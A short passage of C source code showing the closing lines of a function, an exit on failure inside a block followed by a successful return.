        exit(EXIT_FAILURE);
    }
    return EXIT_SUCCESS;
}